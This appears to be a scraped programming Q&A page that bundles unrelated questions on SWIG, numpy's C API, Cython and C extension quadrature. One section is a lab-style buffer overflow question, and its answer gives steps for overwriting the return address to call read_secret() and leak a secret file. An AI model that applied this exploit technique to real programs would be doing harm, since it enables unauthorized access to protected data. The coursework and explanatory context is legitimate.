SWIG c++ vector access in python - python

This may be a noob question but here it goes. I have wrapped a 3d vector into a python module using SWIG. Everything has compiled and I can import the module and perform actions with it. I can't seem to figure out how to access my vector in python to store and change values in it. How do I store and change my vector values in python. My code is below and was written to test if the algorithm stl works with SWIG. It does seem to work but I need to be able to put values into my vector with python.
header.h
#ifndef HEADER_H_INCLUDED
#define HEADER_H_INCLUDED
#include <vector>
using namespace std;
struct myStruct{
int vecd1, vecd2, vecd3;
vector<vector<vector<double> > >vec3d;
void vecSizer();
void deleteDuplicates();
double vecSize();
void run();
};
#endif // HEADER_H_INCLUDED
main.cpp
#include "header.h"
#include <vector>
#include <algorithm>
void myStruct::vecSizer()
{
vec3d.resize(vecd1);
for(int i = 0; i < vec3d.size(); i++)
{
vec3d[i].resize(vecd2);
for(int j = 0; j < vec3d[i].size(); j++)
{
vec3d[i][j].resize(vecd3);
}
}
}
void myStruct::deleteDuplicates()
{
vector<vector<vector<double> > >::iterator it;
sort(vec3d.begin(),vec3d.end());
it = unique(vec3d.begin(),vec3d.end());
vec3d.resize(distance(vec3d.begin(), it));
}
double myStruct::vecSize()
{
return vec3d.size();
}
void myStruct::run()
{
vecSizer();
deleteDuplicates();
vecSize();
}
from the terminal (Ubuntu)
import test #import the SWIG generated module
x = test.myStruct() #create an instance of myStruct
x.vecSize() #run vecSize() should be 0 since vector dimensions are not initialized
0.0
x.vec3d #see if vec3d exists and is of the correct type
<Swig Object of type 'vector< vector< vector< double > > > *' at 0x7fe6a483c8d0>
Thanks in advance!

It turns out that vectors are converted to immutable python objects when the wrapper/interface is generated. So in short you cannot modify wrapped c++ vectors from python.

Related

PyImport_Import segmentation fault after reading in TSV with C++

I am using C++ as a wrapper around a Python module. First, I read in a TSV file, cast it as a numpy array, import my Python module, and then pass the numpy array to Python for further analysis. When I first wrote the program, I was testing everything using a randomly generated array, and it worked well. However, once I replaced the randomly generated array with the imported TSV array, I got a segmentation fault when I tried to import the Python module. Here is some of my code:
#define NPY_NO_DEPRECATED_API NPY_1_7_API_VERSION
#define PY_SSIZE_T_CLEAN
#include <python3.8/Python.h>
#include "./venv/lib/python3.8/site-packages/numpy/core/include/numpy/arrayobject.h"
#include <stdio.h>
#include <iostream>
#include <stdlib.h>
#include <random>
#include <fstream>
#include <sstream>
int main(int argc, char* argv[]) {
setenv("PYTHONPATH", ".", 0);
Py_Initialize();
import_array();
static const int numberRows = 1000;
static const int numberColumns = 500;
npy_intp dims[2]{ numberRows, numberColumns };
static const int numberDims = 2;
double(*c_arr)[numberColumns]{ new double[numberRows][numberColumns] };
// ***********************************************************
// THIS PART OF THE CODE GENERATES A RANDOM ARRAY AND WORKS WITH THE REST OF THE CODE
// // initialize random number generation
// typedef std::mt19937 MyRNG;
// std::random_device r;
// MyRNG rng{r()};
// std::lognormal_distribution<double> lognormalDistribution(1.6, 0.25);
// //populate array
// for (int i=0; i < numberRows; i++) {
// for (int j=0; j < numberColumns; j++) {
// c_arr[i][j] = lognormalDistribution(rng);
// }
// }
// ***********************************************************
// ***********************************************************
// THIS PART OF THE CODE INGESTS AN ARRAY FROM TSV AND CAUSES CODE TO FAIL AT PyImport_Import
std::ifstream data("data.mat");
std::string line;
int row = 0;
int column = 0;
while (std::getline(data, line)) {
std::stringstream lineStream(line);
std::string cell;
while (std::getline(lineStream, cell, '\t')) {
c_arr[row][column] = std::stod(cell);
column++;
}
row++;
column = 0;
if (row > numberRows) {
break;
}
}
// ***********************************************************
PyArrayObject *npArray = reinterpret_cast<PyArrayObject*>(
PyArray_SimpleNewFromData(numberDims, dims, NPY_DOUBLE, reinterpret_cast<void*>(c_arr))
);
const char *moduleName = "cpp_test";
PyObject *pname = PyUnicode_FromString(moduleName);
// ***********************************************************
// CODE FAILS HERE - SEGMENTATION FAULT
PyObject *pyModule = PyImport_Import(pname);
// .......
// THERE IS MORE CODE BELOW NOT INCLUDED HERE
}
So, I'm not sure why the code fails when ingest data from a TSV file, but not when I use randomly generated data.
EDIT: (very stupid mistake incoming) I used the conditional row > numberRows for the stopping condition in the while loop and so this affected the row number used for the final line in the array. Once I changed that conditional to row == numberRows, everything worked. Who knew being specific about rows when building an array was so important? I'll leave this up as a testament to stupid programming mistakes and maybe someone will learn a little something from it.
Note that you don't have to use arrays for storing the information(like double values) in 2D manner because you can also use dynamically sized containers like std::vector as shown below. The advantage of using std::vector is that you don't have to know the number of rows and columns beforehand in your input file(data.mat). So you don't have to allocate memory beforehand for rows and columns. You can add the values dynamically.
#include <iostream>
#include <vector>
#include <string>
#include <sstream>
#include<fstream>
int main() {
std::string line;
double word;
std::ifstream inFile("data.mat");
//create/use a std::vector instead of builit in array
std::vector<std::vector<double>> vec;
if(inFile)
{
while(getline(inFile, line, '\n'))
{
//create a temporary vector that will contain all the columns
std::vector<double> tempVec;
std::istringstream ss(line);
//read word by word(or double by double)
while(ss >> word)
{
//std::cout<<"word:"<<word<<std::endl;
//add the word to the temporary vector
tempVec.push_back(word);
}
//now all the words from the current line has been added to the temporary vector
vec.emplace_back(tempVec);
}
}
else
{
std::cout<<"file cannot be opened"<<std::endl;
}
inFile.close();
//lets check out the elements of the 2D vector so the we can confirm if it contains all the right elements(rows and columns)
for(std::vector<double> &newvec: vec)
{
for(const double &elem: newvec)
{
std::cout<<elem<<" ";
}
std::cout<<std::endl;
}
return 0;
}
The output of the above program can be seen here. Since you didn't provide data.mat file, i created an example data.mat file and used it in my program which can be found at the above mentioned link.

Buffer overflow attack, executing an uncalled function

So, I'm trying to exploit this program that has a buffer overflow vulnerability to get/return a secret behind a locked .txt (read_secret()).
vulnerable.c //no edits here
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void read_secret() {
FILE *fptr = fopen("/task2/secret.txt", "r");
char secret[1024];
fscanf(fptr, "%512s", secret);
printf("Well done!\nThere you go, a wee reward: %s\n", secret);
exit(0);
}
int fib(int n)
{
if ( n == 0 )
return 0;
else if ( n == 1 )
return 1;
else
return ( fib(n-1) + fib(n-2) );
}
void vuln(char *name)
{
int n = 20;
char buf[1024];
int f[n];
int i;
for (i=0; i<n; i++) {
f[i] = fib(i);
}
strcpy(buf, name);
printf("Welcome %s!\n", buf);
for (i=0; i<20; i++) {
printf("By the way, the %dth Fibonacci number might be %d\n", i, f[i]);
}
}
int main(int argc, char *argv[])
{
if (argc < 2) {
printf("Tell me your names, tricksy hobbitses!\n");
return 0;
}
// printf("main function at %p\n", main);
// printf("read_secret function at %p\n", read_secret);
vuln(argv[1]);
return 0;
}
attack.c //to be edited
#!/usr/bin/env bash
/task2/vuln "$(python -c "print 'a' * 1026")"
I know I can cause a segfault if I print large enough string, but that doesn't get me anywhere. I'm trying to get the program to execute read_secret by overwriting the return address on the stack, and returns to the read_secret function, instead of back to main.
But I'm pretty stuck here. I know I would have to use GDB to get the address of the read_secret function, but I'm kinda confused. I know that I would have to replace the main() address with the read_secret function's address, but I'm not sure how.
Thanks
If you want to execute a function through a buffer overflow vulnerability you have to first identify the offset at which you can get a segfault. In your case I assume its 1026. The whole game is to overwrite the eip(what tells the program what to do next) and then add your own instruction.
To add your own instruction you need to know the address of said instruction and then so in gdb open your program and then type in:
x function name
Then copy the address. You then have to convert it to big or little endian format. I do it with the struct module in python.
import struct
struct.pack("<I", address) # for little endian for big endian its different
Then you have to add it to your input to the binary so something like:
python -c "print 'a' * 1026 + 'the_address'" | /task2/vuln
#on bash shell, not in script
If all of this doesnt work then just add a few more characters to your offset. There might be something you didnt see coming.
python -c "print 'a' * 1034 + 'the_address'" | /task2/vuln
Hope that answers your question.

Cython macro definition in structure

I'm using Cython to import a structure to python from C while there are some macro definitions which include functions. I just don't how to realize the structure in Cython.
typedef struct _SparMat {
int m, n;
int *rvec;
int *ridx;
double *rval;
int *cvec;
int *cidx;
double *cval;
int nnz;
int bufsz;
int incsz;
int flag;
#define MAT_ROWBASE_INDEX (0x00000001)
#define MAT_ROWBASE_VALUE (0x00000002)
#define MAT_COLBASE_INDEX (0x00000004)
#define MAT_COLBASE_VALUE (0x00000008)
#define CSR_INDEX(flag) ((flag) & MAT_ROWBASE_INDEX)
#define CSR_VALUE(flag) ((flag) & MAT_ROWBASE_VALUE)
#define CSC_INDEX(flag) ((flag) & MAT_COLBASE_INDEX)
#define CSC_VALUE(flag) ((flag) & MAT_COLBASE_VALUE)
} SparMat, * matptr;

Equivalent of python lambda function for C (Python Extensions)

I'v written a Python extension module with C to speed up computation times. The first step is a 2D integration of a function f(x,y,k), which is very fast and allows me to integrate over y in [y1(x),y2(x)] and x in [a,b] whilst assigning a float to k. But I really need to integrate k over the range [c,d]. Currently, I'm doing something like this in Python
inner = lambda k: calc.kernel(l,k,ki)
I = quad(inner,c,d)[0]
where calc is my C-extension module and calc.kernel calls gauss2 to perform 2D integration. l and ki are just other variables. But with my data, quad still takes many hours to finish. I would like to do all calculations within the C-extension module, but I'm really stumped on how to implement this outer integral. Here is my C-code
#include <Python.h>
#include <math.h>
double A96[96]={ /* abscissas for 96-point Gauss quadrature */
};
double W96[96]={ /* weights for 96-point Gauss quadrature */
};
double Y1(double x){
return 0;
}
double Y2(double x){
return x;
}
double gauss1(double F(double),double a,double b)
{ /* 96-pt Gauss qaudrature integrates F(x) from a to b */
int i;
double cx,dx,q;
cx=(a+b)/2;
dx=(b-a)/2;
q=0;
for(i=0;i<48;i++)
q+=W96[i]*(F(cx-dx*A96[i])+F(cx+dx*A96[i]));
return(q*dx);
}
double gauss2(double F(double,double,int,double,double),double Y1(double),double Y2(double),double a,double b,int l,double k, double ki)
{/* 96x96-pt 2-D Gauss qaudrature integrates
F(x,y) from y=Y1(x) to Y2(x) and x=a to b */
int i,j,h;
double cx,cy,dx,dy,q,w,x,y1,y2;
cx=(a+b)/2;
dx=(b-a)/2;
q=0;
for(i=0;i<48;i++)
{
for(h=-1;h<=1;h+=2)
{
x=cx+h*dx*A96[i];
y1=Y1(x);
y2=Y2(x);
cy=(y1+y2)/2;
dy=(y2-y1)/2;
w=dy*W96[i];
for(j=0;j<48;j++)
q+=w*W96[j]*(F(x,cy-dy*A96[j],l,k,ki)+F(x,cy+dy*A96[j],l,k,ki));
}
}
return(q*dx);
}
double ps_fact(double z){
double M = 0.3;
return 3/2*(M*(1+z)*(1+z)*(1+z) + (1-M))*(M*(1+z)*(1+z)*(1+z) + (1-M))*(M*(1+z)*(1+z)*(1+z) + (1-M))/(1+z)/(1+z);
}
double drdz(double z){
double M = 0.3;
return 3000/sqrt(M*(1+z)*(1+z)*(1+z) + (1-M));
}
double rInt(double z){
double M = 0.3;
return 3000/sqrt(M*(1+z)*(1+z)*(1+z) + (1-M));
}
double kernel_func ( double y , double x, int l,double k, double ki) {
return ps_fact(y)*ki*rInt(x)*sqrt(M_PI/2/rInt(x))*jn(l+0.5,ki*rInt(x))*drdz(x)*(rInt(x)-rInt(y))/rInt(y)*sqrt(M_PI/2/rInt(y))*jn(l+0.5,k*rInt(y))*drdz(y);
}
static PyObject* calc(PyObject* self, PyObject* args)
{
int l;
double k, ki;
if (!PyArg_ParseTuple(args, "idd", &l, &k, &ki))
return NULL;
double res;
res = gauss2(kernel_func,Y1, Y2, 0,10,l, k, ki);
return Py_BuildValue("d", res);
}
static PyMethodDef CalcMethods[] = {
{"kernel", calc, METH_VARARGS, "Calculates kernel values."},
{NULL, NULL, 0, NULL}
};
PyMODINIT_FUNC initcalc(void){
(void) Py_InitModule("calc", CalcMethods);
A96 and W96 both contain the points for the Gaussian quadrature, so don't worry that they are empty here. I should add I don't take any credit for the functions gauss1 and gauss2.
EDIT: python code was wrong - edited now.
Maybe the source code for scipy integrate quad is a good place to start if you haven't looked there : https://github.com/scipy/scipy/blob/v0.17.0/scipy/integrate/quadpack.py#L45-L360
Looks like most of the work is already being done by native Fortran code, which is normally either as fast or faster than C/C++ code. You will be hard pressed to improve on that, unless you create/find a CUDA implementation.
You make the Fortran code multithreaded, if it's not already and the source is open. Lastly, you could make a threading dispatcher in C/Fortran (python doesn't support real threading because of the GIL) and just make your calls to quad parallel from one another atleast. Interfacing calc directly with Fortran quad would probably save you some decent overhead too.

creating numpy array in c extension segfaults

I'm just trying to start off by creating a numpy array before I even start to write my extension. Here is a super simple program:
#include <stdio.h>
#include <iostream>
#include "Python.h"
#include "numpy/npy_common.h"
#include "numpy/ndarrayobject.h"
#include "numpy/arrayobject.h"
int main(int argc, char * argv[])
{
int n = 2;
int nd = 1;
npy_intp size = {1};
PyObject* alpha = PyArray_SimpleNew(nd, &size, NPY_DOUBLE);
return 0;
}
This program segfaults on the PyArray_SimpleNew call and I don't understand why. I'm trying to follow some previous questions (e.g. numpy array C api and C array to PyArray). What am I doing wrong?
Typical usage of PyArray_SimpleNew is for example
int nd = 2;
npy_intp dims[] = {3,2};
PyObject *alpha = PyArray_SimpleNew(nd, dims, NPY_DOUBLE);
Note that the value of nd must not exceed the number of elements of array dims[].
ALSO: The extension must call import_array() to set up the C API's function-pointer table. E.g. in Cython:
import numpy as np
cimport numpy as np
np.import_array() # so numpy's C API won't segfault
cdef make_array():
cdef np.npy_intp element_count = 100
return np.PyArray_SimpleNew(1, &element_count, np.NPY_DOUBLE)

Categories